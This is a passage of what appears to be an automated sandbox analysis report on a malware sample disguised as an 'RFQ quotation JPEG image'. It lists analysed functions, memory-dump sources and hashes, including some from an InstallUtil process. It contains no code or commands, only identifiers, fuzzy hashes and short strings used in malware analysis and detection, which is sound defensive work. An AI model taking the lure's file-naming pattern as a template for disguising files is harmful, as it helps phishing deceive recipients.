                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Teeq
                          • API String ID: 0-348098666
                          • Opcode ID: 88ceaca62656da3ea39b83345fd8574218c9f227a81b56cde49a2ec0c33d6abf
                          • Instruction ID: 114a9b75e49e899851430a84a87ea959e39842bc2492908ae24b57f793ee7d7a
                          • Opcode Fuzzy Hash: 88ceaca62656da3ea39b83345fd8574218c9f227a81b56cde49a2ec0c33d6abf
                          • Instruction Fuzzy Hash: EFA10474E01218CFEB64DFA9D849B9EBBF2BF89304F1090A9D409AB255DB749D85CF40
                          Function 06507D68 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: diq
                          • API String ID: 0-2475236906
                          • Opcode ID: d80ecc6b8ad4556d90361c3bd92fe4289de6733c00a1d261c1a3f393597c5cad
                          • Instruction ID: c5acfbefa177b0be169332f8c445dea5b2f876ab2a6b82c2be4f15e65e7c33e9
                          • Opcode Fuzzy Hash: d80ecc6b8ad4556d90361c3bd92fe4289de6733c00a1d261c1a3f393597c5cad
                          • Instruction Fuzzy Hash: EB715974D15219CFEB54DFA8E948BEDBBB1FB89300F508169D409A7284DB78AD89CF40
                          Function 06507D78 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: diq
                          • API String ID: 0-2475236906
                          • Opcode ID: a755500525e9d1a7b1761737edacc71f79388993d3e8d3caef16c2f95b160441
                          • Instruction ID: 0a59fac96087d4b5b982f799eb75472888d829599cfbbf41fc81f87059bb702f
                          • Opcode Fuzzy Hash: a755500525e9d1a7b1761737edacc71f79388993d3e8d3caef16c2f95b160441
                          • Instruction Fuzzy Hash: AB714674E15219CFEB54DFA8E848BEDBBB5FB49300F508169D409A7284DB78AD89CF40
                          Function 06830007 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Y
                          • API String ID: 0-3233089245
                          • Opcode ID: 4ffdfd1d6b78dad1a316105364470e644d1317824ecaff9c278130dffb0e8ece
                          • Instruction ID: c59cb32df0e0b4ed525df2d61d7ea1b942f3f21da6e28ee6e338e117bc03a37b
                          • Opcode Fuzzy Hash: 4ffdfd1d6b78dad1a316105364470e644d1317824ecaff9c278130dffb0e8ece
                          • Instruction Fuzzy Hash: 2A317C70D057588FE769CF6A8D5468ABBF6AF85200F08C1FAC44CAA215DB340A86DF51
                          Function 065B1F81 Relevance: .3, Instructions: 269COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 30b619aebebd9d652bce241bb81d0daa74c9b998e5fdcef28ae74fb32bbb8410
                          • Instruction ID: 6961490969ac3965e458306e0dfde746734df059861b2cf1b6059dfe789ea6bf
                          • Opcode Fuzzy Hash: 30b619aebebd9d652bce241bb81d0daa74c9b998e5fdcef28ae74fb32bbb8410
                          • Instruction Fuzzy Hash: F6B13874E04218DFEB94DFA9E898BEDBBB6FB49300F10A069D409A7291CB745D85CF50
                          Function 065B1F90 Relevance: .3, Instructions: 262COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3615385ecc3f36ab790f0b6f9accf7042734b9734cccffac0083b2ba8387375d
                          • Instruction ID: 63d5a3c6cb63486c07177675777eab7ab2a550bcd6dcead44b23c05c14c13229
                          • Opcode Fuzzy Hash: 3615385ecc3f36ab790f0b6f9accf7042734b9734cccffac0083b2ba8387375d
                          • Instruction Fuzzy Hash: A4B13874E04218DFEB94DFA9E898BEDBBB6FB4A300F10A069D409A7254CB745D85CF50
                          Function 064FDB81 Relevance: .3, Instructions: 257COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: edc92fc03b4b8fae8cdd60df11eeac419ac28cb72e88cd1c6e1afc705ee81bf6
                          • Instruction ID: e502b6851e1dfa70e251eceb2b73512884e1e60d5bf6948438154282715d0db9
                          • Opcode Fuzzy Hash: edc92fc03b4b8fae8cdd60df11eeac419ac28cb72e88cd1c6e1afc705ee81bf6
                          • Instruction Fuzzy Hash: 4AB1C474E10218DFDB54CFA8D988BADBBF1FF4A300F10816AD509AB294DB789985CF54
                          Function 064FB142 Relevance: .2, Instructions: 249COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef5f120cca4d5b47740fb94b2feaaadc6b3c3d0d54ac821f359ffa42f530c052
                          • Instruction ID: 4ed06ebc3a42fe69b49b1e34b81500e9adecc0a9b4fe2b26223e6904d6a46b2b
                          • Opcode Fuzzy Hash: ef5f120cca4d5b47740fb94b2feaaadc6b3c3d0d54ac821f359ffa42f530c052
                          • Instruction Fuzzy Hash: A8B1E174E11218CFEB54CFA9D948BAEBBF2FF4A300F10916AD509AB255DB745886CF40
                          Function 064FB150 Relevance: .2, Instructions: 244COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3173cf92cf499ea8a3956f852acb1765d4dec0a12f86e20c8950fa6f9c5ef12
                          • Instruction ID: 62f401c78d9202b09e766cd43ae3040aba67f0ac8a5c2a02984f6b160650e13d
                          • Opcode Fuzzy Hash: f3173cf92cf499ea8a3956f852acb1765d4dec0a12f86e20c8950fa6f9c5ef12
                          • Instruction Fuzzy Hash: 52B1E274E11218CFEB54CFA9D988B9EBBF2FF4A300F10916AD509AB255DB745886CF40
                          Function 064FDE8D Relevance: .2, Instructions: 231COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 99a255143ef4c30fe9694ec626ba753dab95fda40b5cf42e42dbc752811cf392
                          • Instruction ID: cb02deef5b57b61cdd9e0e7f8c95925c7fe97de942fd099097fb9afdb98ba2a0
                          • Opcode Fuzzy Hash: 99a255143ef4c30fe9694ec626ba753dab95fda40b5cf42e42dbc752811cf392
                          • Instruction Fuzzy Hash: EBB1C274E10218DFDB94CFA8D888BADBBF1FF4A300F10416AD509AB294DB749985CF54
                          Function 064F5418 Relevance: .2, Instructions: 222COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 59fce52b0ac15aaeb83eb28c3f40b39573fd3bf6b8402f57883d4518139f985f
                          • Instruction ID: c939457e9d79da438ddf0e81db75c6137efd20bff91c07b2dbb84c42dc4d66fd
                          • Opcode Fuzzy Hash: 59fce52b0ac15aaeb83eb28c3f40b39573fd3bf6b8402f57883d4518139f985f
                          • Instruction Fuzzy Hash: 6F912470E11208DFEB98CF68E548BADB7F2FF99301F10906AE119AB254DB745985CF50
                          Function 064F5428 Relevance: .2, Instructions: 215COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a01729e4d4ebe13fc2c6b8f2801693a2ea05020e05c9d5ede9ac5560b69607d
                          • Instruction ID: b96640316be0c31422025043e1cd8a1d6c2f9f467247d87b670cafcb2c16fbef
                          • Opcode Fuzzy Hash: 4a01729e4d4ebe13fc2c6b8f2801693a2ea05020e05c9d5ede9ac5560b69607d
                          • Instruction Fuzzy Hash: A7913570E11208DFEB98CF68E548BADB7F6FF99301F10906AE119AB254DB745985CF40
                          Function 064F566E Relevance: .2, Instructions: 206COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aed1482ea5d8ed2a5e4af2b7c705eacf0d0f44aa38b1a7aa5dcb8649c1319823
                          • Instruction ID: 98eb424e28cf4f2676574b031bd69f16925937c8e963713895c8306e6b495b7e
                          • Opcode Fuzzy Hash: aed1482ea5d8ed2a5e4af2b7c705eacf0d0f44aa38b1a7aa5dcb8649c1319823
                          • Instruction Fuzzy Hash: E091E370E11208CFEB98CFA9E548BADB7F2FF99301F10906AE119AB254DB745985CF50
                          Function 0684CF38 Relevance: .2, Instructions: 190COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 00d8f70ea8bb24f0cbcccde28380e6538cd3ccb1e12513672d70a834c7109c70
                          • Instruction ID: 6cdca2229eed8d53834b846a8365a1654def18df2f26370b5438d0431d3ed56f
                          • Opcode Fuzzy Hash: 00d8f70ea8bb24f0cbcccde28380e6538cd3ccb1e12513672d70a834c7109c70
                          • Instruction Fuzzy Hash: B8710870D0521CCFEBA4EF6AC845BADBBF5AF4A304F109069D409EB241D7B45985CF91
                          Function 014120B1 Relevance: .2, Instructions: 188COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7618f9b3384175f26b39a3b14ce8656c6153e94c62e2d4c55460607d9728f19f
                          • Instruction ID: f970629935875ecdd349eecc89aa05355647c529425ecd5716b6d26b1af9ebc3
                          • Opcode Fuzzy Hash: 7618f9b3384175f26b39a3b14ce8656c6153e94c62e2d4c55460607d9728f19f
                          • Instruction Fuzzy Hash: 48612C72F106258FD754DB69C880AAEB7A3AFC8611F2A8165D405DB36ADE74AC018B90
                          Function 06508892 Relevance: .1, Instructions: 142COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9413b1d35c4c10227bdaf8d9e7d00897bd9f8545e6a80a60c9e4440505b76b9a
                          • Instruction ID: 5a7b972979a308f1c2604370fc365f9dc6eecb6af3a4fc754e5cfb00797545b4
                          • Opcode Fuzzy Hash: 9413b1d35c4c10227bdaf8d9e7d00897bd9f8545e6a80a60c9e4440505b76b9a
                          • Instruction Fuzzy Hash: 67510370D05218DFEF94DFA8E848BEDBBB6FB89310F10852AE505A7294D7789845CF44
                          Function 065088A0 Relevance: .1, Instructions: 137COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c7f6da1a7fea871d300ab8dcf99b979ad2be77c8972626dad5230d183f15009b
                          • Instruction ID: 1d350ff6e8fda72c553f474966841c1095ce940b5dd99c2ecbf597747e70a507
                          • Opcode Fuzzy Hash: c7f6da1a7fea871d300ab8dcf99b979ad2be77c8972626dad5230d183f15009b
                          • Instruction Fuzzy Hash: 91510070E05218CFEF84DFA8E448BEDBBB6FB89310F10952AD509A7294C7789845CF44
                          Function 065C0033 Relevance: .1, Instructions: 130COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112388205.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65c0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8dbcc14dedda0ddddb181126b2a77c67e854f694b81786787f2e54bfb152fe3
                          • Instruction ID: d82f62015608e165337f4f3fb1976cc1a9d067606ebc4cc9481d7ace34ab4c22
                          • Opcode Fuzzy Hash: f8dbcc14dedda0ddddb181126b2a77c67e854f694b81786787f2e54bfb152fe3
                          • Instruction Fuzzy Hash: E0518BB1D056A48FEB29CF2B8D446D6FAB3AFC9314F14C0FA944CAA119DB710A85DF41
                          Function 065C0040 Relevance: .1, Instructions: 126COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112388205.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65c0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: da50822f2508174858f0c1f187866382f87c5188a9006f2063668ea67d736beb
                          • Instruction ID: 015cd9653e813ad5321271fbd703de5fd2b2a894424b2b46b74950a3fce4d6ab
                          • Opcode Fuzzy Hash: da50822f2508174858f0c1f187866382f87c5188a9006f2063668ea67d736beb
                          • Instruction Fuzzy Hash: AD519FB1D056688FEB68CF2B8D406CAFAF3AFC9300F04C1FA854CA6255DB704AC18E41
                          Function 065CD918 Relevance: .1, Instructions: 114COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112388205.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65c0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7ded46a88815467505e07d0c02811cdc4ee68561dd6f27ac11a69f3cf02631d
                          • Instruction ID: ce65d2679832803779e0345a7e7838c5dd814e4c7763561731dedf74727de3cf
                          • Opcode Fuzzy Hash: f7ded46a88815467505e07d0c02811cdc4ee68561dd6f27ac11a69f3cf02631d
                          • Instruction Fuzzy Hash: BC41FCB4D043489FDB60CFE9D984A9DBBF1BF49310F209129E818AB354D7749885CF85
                          Function 06540006 Relevance: .1, Instructions: 110COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee43a54e1da8daa2218573bff382e615ce787d85ad1d8d47171b410686321eb1
                          • Instruction ID: 326b13caad7d5dc8af5758645a03ba0f7d9378d565680768282626583b89218b
                          • Opcode Fuzzy Hash: ee43a54e1da8daa2218573bff382e615ce787d85ad1d8d47171b410686321eb1
                          • Instruction Fuzzy Hash: 5041DE71E05B549FEB1DCF6B8C0058AFBF7AFC9210F18C1BAD448AA265EB3409468F11
                          Function 014112F6 Relevance: .1, Instructions: 106COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae6308d88f8be6e88204717706c6acd7bb45bc29a0e6a8cf8829ed06b8529e83
                          • Instruction ID: 3671742d8c4e493660b0c3433fa7360d920924a5ed2883d586e45826d4cecae9
                          • Opcode Fuzzy Hash: ae6308d88f8be6e88204717706c6acd7bb45bc29a0e6a8cf8829ed06b8529e83
                          • Instruction Fuzzy Hash: 0A414B78E5415E8FDF20CFA9E481AADB7F1BF48305F14E656D01AEB259CB31A841CB40
                          Function 064F4420 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a11fddc7e67ba97ac21c12e75f59ee71de8bc5e722602cfacad8633787780e1b
                          • Instruction ID: bbf7661442e99f2ccd933d524270955a35bb00b09be78952845c10f9f58e25af
                          • Opcode Fuzzy Hash: a11fddc7e67ba97ac21c12e75f59ee71de8bc5e722602cfacad8633787780e1b
                          • Instruction Fuzzy Hash: 7541FEB5C04258DFCB10CFA9D884AEEFBF4EB09310F14946AE415B7241C738AA85CFA4
                          Function 064F4428 Relevance: .1, Instructions: 95COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111848323.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_64f0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3dfa10d98e957fa537365cc97a627b04be392dfbd33b6ceeb0cfa29c72c1a304
                          • Instruction ID: ba78dba6f3f7684491e40eee1c3b30a663cc753567335b7e4b64e918cb4cd929
                          • Opcode Fuzzy Hash: 3dfa10d98e957fa537365cc97a627b04be392dfbd33b6ceeb0cfa29c72c1a304
                          • Instruction Fuzzy Hash: 9A41CEB5D042589FCB10CFA9D984AEEFBF4AB49310F14942AE455B7241C738AA85CFA4
                          Function 0650FAA0 Relevance: .1, Instructions: 70COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 492d2bbf70edbf8d5288476a306b7ca63d2cf924d2626828cd551d82e378da79
                          • Instruction ID: 40dc98733a2c3fc77624a3054555053568dfe34f9c6bc6ae7594f79e4ded2594
                          • Opcode Fuzzy Hash: 492d2bbf70edbf8d5288476a306b7ca63d2cf924d2626828cd551d82e378da79
                          • Instruction Fuzzy Hash: E121F2B5D042189FDB20CFA9D985AEEFBF5FB49320F14901AE815B7250CB35A941CFA4
                          Function 0650FAA8 Relevance: .1, Instructions: 66COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ad48bf14c687d9f5bdcdd9405426bf905571f6dccac41f9084449669b438ed12
                          • Instruction ID: a110b6e6e9174ad57bfcd96ba8049a732e7bdaed32c418e893be0829b17d2ae2
                          • Opcode Fuzzy Hash: ad48bf14c687d9f5bdcdd9405426bf905571f6dccac41f9084449669b438ed12
                          • Instruction Fuzzy Hash: 3F21F2B5D042189FDB10CFA9D984AEEFBF4FB49320F14901AE804B7250CB35A941CFA4
                          Function 06502880 Relevance: 5.2, Strings: 4, Instructions: 184COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: (_eq$(_eq$(_eq$(_eq
                          • API String ID: 0-3755777045
                          • Opcode ID: d50f8e731471e3a0c4ade24ef6ce17c13e97b07ef0ca4d274887279a1c4f3b64
                          • Instruction ID: 03571ce4d9a481d214ab013175b63e4aff8359628e5cda00d465340fa54932d3
                          • Opcode Fuzzy Hash: d50f8e731471e3a0c4ade24ef6ce17c13e97b07ef0ca4d274887279a1c4f3b64
                          • Instruction Fuzzy Hash: 8851D074B002059FDB44DF78D85886EBBB6FF89300B148969E546AB395DB31ED81CB90

                          Executed Functions

                          Function 014D6748 Relevance: 6.7, Strings: 5, Instructions: 460COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: (oeq$(oeq$(oeq$,iq$,iq
                          • API String ID: 0-1557207691
                          • Opcode ID: 2af04da79a8439dbf67ac27101ebb21a0d8642d146f6a428240a4459addeeeea
                          • Instruction ID: 0f0936a05385a3c94b185e0dc1a2814226081d2bd3086f0d8beb176f4ffb8a47
                          • Opcode Fuzzy Hash: 2af04da79a8439dbf67ac27101ebb21a0d8642d146f6a428240a4459addeeeea
                          • Instruction Fuzzy Hash: D7124C70A002199FDF15CFA9C994AAEBBB2FF88300F16846AE515AB371D730ED41CB51
                          Function 014DB338 Relevance: 6.6, Strings: 5, Instructions: 346COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$Ljlp$Ljlp$PHeq$PHeq
                          • API String ID: 0-246074837
                          • Opcode ID: 42b6c693c6fae3738c81ea5897ede726e268c6d66b7cad97adb1574c4e1b7635
                          • Instruction ID: 7852b9bcba4e42afea6a7275237266c33972f0ea50f8f91cd24221984891fb11
                          • Opcode Fuzzy Hash: 42b6c693c6fae3738c81ea5897ede726e268c6d66b7cad97adb1574c4e1b7635
                          • Instruction Fuzzy Hash: 2DE1E975E00218CFDF15DFA9C994A9EBBB1FF49310F16806AE919AB361DB30A841CF51
                          Function 014DC1A0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$Ljlp$Ljlp$PHeq$PHeq
                          • API String ID: 0-246074837
                          • Opcode ID: 630ecd3fa2b57da487a03829523990c6126410339e078a4d2180657c3dcf0aa3
                          • Instruction ID: 44c0e3b9e7190d5ef1a9689621782a55cd991a3553b390dc613eb5b2b1d6af9d
                          • Opcode Fuzzy Hash: 630ecd3fa2b57da487a03829523990c6126410339e078a4d2180657c3dcf0aa3
                          • Instruction Fuzzy Hash: CE81A474E00618DFDB14DFAAD894A9EBBF2FF89300F14806AE519AB365DB349941CF50
                          Function 014DC480 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$Ljlp$Ljlp$PHeq$PHeq
                          • API String ID: 0-246074837
                          • Opcode ID: 13dbb4029a99149894c685b1925842fb91cfffa6991da44249b8fd9587571f05
                          • Instruction ID: 1cd15a28c9891089698969d2b591c17fb49cc2de5bcbf434a9a6a0d344f79333
                          • Opcode Fuzzy Hash: 13dbb4029a99149894c685b1925842fb91cfffa6991da44249b8fd9587571f05
                          • Instruction Fuzzy Hash: D08194B4E00218DFDF14DFAAD994A9DBBF2BF88300F14906AE419AB365DB309941CF51
                          Function 014D46D9 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$Ljlp$Ljlp$PHeq$PHeq
                          • API String ID: 0-246074837
                          • Opcode ID: 2d062e63210efa0bc162114daf25eba07878671fb81fb3b39a33307c4f1cd4db
                          • Instruction ID: b2e6653cfefee6f4067dbc2d5ebe32824ebecc2a036a95db01d98c61e7fbb282
                          • Opcode Fuzzy Hash: 2d062e63210efa0bc162114daf25eba07878671fb81fb3b39a33307c4f1cd4db
                          • Instruction Fuzzy Hash: 2181A474E01258DFDB54DFAAD994A9EBBF2BF88300F14806AE419AB365DB349941CF10
                          Function 014DCA42 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.4523391759.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_14d0000_InstallUtil.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0olp$Ljlp$Ljlp$PHeq$PHeq
                          • API String ID: 0-246074837
                          • Opcode ID: e8d594cb4ae8df7602594c93fe0d0a976f075045ca299eedc5c4a6f81d4aac92
                          • Instruction ID: 1a738e1a5f8f73505ec15238a79c77d2f9d7a98c07093410149ce2e6314ad056
